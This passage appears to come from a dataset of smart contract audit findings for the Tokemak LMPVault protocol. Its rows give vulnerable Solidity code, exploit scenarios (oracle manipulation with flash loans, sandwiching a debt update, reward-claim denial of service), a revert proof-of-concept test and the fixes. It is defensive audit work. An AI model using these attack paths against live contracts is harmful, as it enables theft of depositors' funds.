contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, ""account"");\\n Errors.verifyNotZero(amount, ""amount"");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\n",Loss of reward tokens for the vault shareholders.,"```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n" +Differences between actual and cached total assets can be arbitraged,high,"The actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. 
This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is receiving more shares than expected.\\nIf Bob redeems all his nine (9) shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\\n$$ \\begin{align} assetsReceived &= \\frac{9.090909091e18\\ shares}{(100e18 + 9.090909091e18)\\ shares} \\times (115 + 10)\\ ETH \\ &= \\frac{9.090909091e18\\ shares}{109.090909091e18\\ shares} \\times 125 ETH \\ &= 10.41666667\\ ETH \\end{align} $$\\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. 
Bob gains is the loss of other vault shareholders.\\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-run it to take advantage of the lower-than-expected price or NAV/share, and back-run it to sell the shares when the price or NAV/share rises after the update.\\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, perform an update on the total assets, and deposit at a lower price or NAV/share.",Consider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.,Loss assets for vault shareholders. Attacker gains are the loss of other vault shareholders.,```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n +Incorrect pricing for CurveV2 LP Token,high,"Using the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n """"""\\n Approximate LP token price\\n """"""\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second 
coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. 
Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, ""token"");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\n",Issue Incorrect pricing for CurveV2 LP Token\\nUpdate the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` return the price of `coins[1]` with `coins[0]` as the quote currency.,"The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.","```\\ndef lp_price() -> uint256:\\n """"""\\n Approximate LP token price\\n """"""\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n" +Incorrect number of shares minted as fee,high,"```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n 
if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$",The correct formula to compute the number of shares minted as fee should be as follows:\\n$$ \\begin{align} shares2mint &= \\frac{profit \\times performanceFeeBps \\times totalSupply}{(totalAsset() \\times MAX_FEE_BPS) - (performanceFeeBps \\times profit) } \\ &= \\frac{100\\epsilon \\times 2000 \\times 100 shares}{(1000\\epsilon \\times 10000) - (2000 \\times 100\\epsilon)} \\ &= 2.0408163265306122448979591836735\\ shares \\end{align} $$\\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\\n$$ \\begin{align} value &= 2.0408163265306122448979591836735\\ shares \\times \\frac{1000\\ WETH}{100 
+ 2.0408163265306122448979591836735\\ shares} \\ &= 2.0408163265306122448979591836735\\ shares \\times 9.8039\\ WETH\\ &= 20\\ WETH \\end{align} $$,Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n" +Maverick oracle can be manipulated,high,"In the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the 
price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.",Use another calculation for Maverick oracle,"There are multiple impacts that an attacker can exploit by manipulating the price of MavEthOracle:\\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.","```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / 
boostedPositionTotalSupply;\\n```\\n" +Aura/Convex rewards are stuck after DOS,high,"Anyone can claim Convex rewards for any account.\\n```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n\\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n\\n uint256[] memory balancesBefore = new uint256[](totalLength);\\n uint256[] memory amountsClaimed = new uint256[](totalLength);\\n// rest of code\\n\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n return (amountsClaimed, rewardTokens);\\n```\\n\\nAdversary can call the external convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\\nNow, when Tokemak calls claimRewards, then no new rewards are transferred, because the attacker already transferred them. `amountsClaimed` will be 0.",Don't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. 
This assumes that only the specific rewards balance is in the contract.,Rewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.,"```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n" +`LMPVault._withdraw()` can revert due to an arithmetic underflow,medium,"Inside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. 
Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n 
}\\n```\\n","Issue `LMPVault._withdraw()` can revert due to an arithmetic underflow\\nTo mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`\\n```\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\\n info.totalAssetsToPull\\n ) {\\n info.idleIncrease =\\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\\n info.totalAssetsToPull;\\n if (info.totalAssetsPulled >= info.debtDecrease) {\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n }\\n break;\\n }\\n\\n // No need to keep going if we have the amount we're looking for\\n // Any overage is accounted for above. Anything lower and we need to keep going\\n // slither-disable-next-line incorrect-equality\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\\n info.totalAssetsToPull\\n ) {\\n break;\\n }\\n```\\n","The vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. 
Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.","```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n" +Unable to withdraw extra rewards,medium,"Suppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this 
account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, ""account"");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able 
to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.","To remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, ""account"");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\n","There is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. 
If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.","```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n" +Malicious or compromised admin of certain LSTs could manipulate the price,medium,"Important Per the contest detail page, admins of the external protocols are marked as ""Restricted"" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\\nRESTRICTED\\nNote This issue also applies to other support Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\\nLiquid Staking Tokens\\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of Swell protocol could upgrade the contracts.\\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. 
Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\\n```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n","The protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.",Loss of assets in the scenario as described above.,```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n +`previewRedeem` and `redeem` functions deviate from the ERC4626 specification,medium,"Important The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? 
Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. 
Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible that the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = 